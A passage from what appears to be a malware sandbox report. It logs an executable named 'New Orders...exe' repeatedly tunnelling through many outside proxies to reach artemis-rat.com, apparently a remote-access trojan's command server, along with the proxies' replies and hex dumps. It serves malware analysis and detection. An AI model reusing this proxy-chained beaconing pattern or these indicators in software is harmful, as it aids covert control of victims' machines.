                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1938192.168.2.95509445.11.95.16552137672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.371167898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1939192.168.2.95512479.110.201.23580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.371794939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1940192.168.2.9551298.217.95.4488997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.371824026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1941192.168.2.955117103.129.3.246837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.372761965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.163991928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.016314983 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1942192.168.2.955151172.93.213.177807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.372761965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.362472057 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:53 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1943192.168.2.9551288.222.239.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.389096975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.163940907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1944192.168.2.955153129.213.150.205807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.396258116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1945192.168.2.95392414.232.160.247108017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.407824993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1946192.168.2.95510064.227.108.25319087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.409028053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1947192.168.2.95513647.100.236.2380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.421272039 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:52.794365883 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1948192.168.2.955130183.89.81.7841457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.424773932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1949192.168.2.955126103.153.154.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.443804979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.870420933 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1950192.168.2.955138119.18.149.3480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.446343899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1951192.168.2.955164194.4.50.61123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.459671974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1952192.168.2.955134103.148.51.1980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.477427959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1953192.168.2.955144208.102.51.6582087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.489788055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1954192.168.2.95511168.169.60.22083807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.506791115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1955192.168.2.955154103.76.12.5831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.555800915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.044023037 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1956192.168.2.9551718.218.100.12080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.565651894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.874289036 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1957192.168.2.955108119.91.214.11933897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.587395906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1958192.168.2.955172103.216.49.23380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.613089085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.967736006 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1959192.168.2.955163124.198.74.90269767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.621696949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.476397991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773493052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.164082050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.724385977 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1960192.168.2.955179192.111.135.17183027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.629556894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1961192.168.2.955185104.21.84.251807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.629565954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.794229031 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1962192.168.2.95405342.193.58.9680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.633304119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.523952007 CET58INHTTP/1.1 200 Connection established
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1963192.168.2.95400427.219.56.18310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.659506083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773365021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.508690119 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1964192.168.2.955178184.185.2.1241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.665278912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1965192.168.2.955183142.54.229.24941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.669600010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
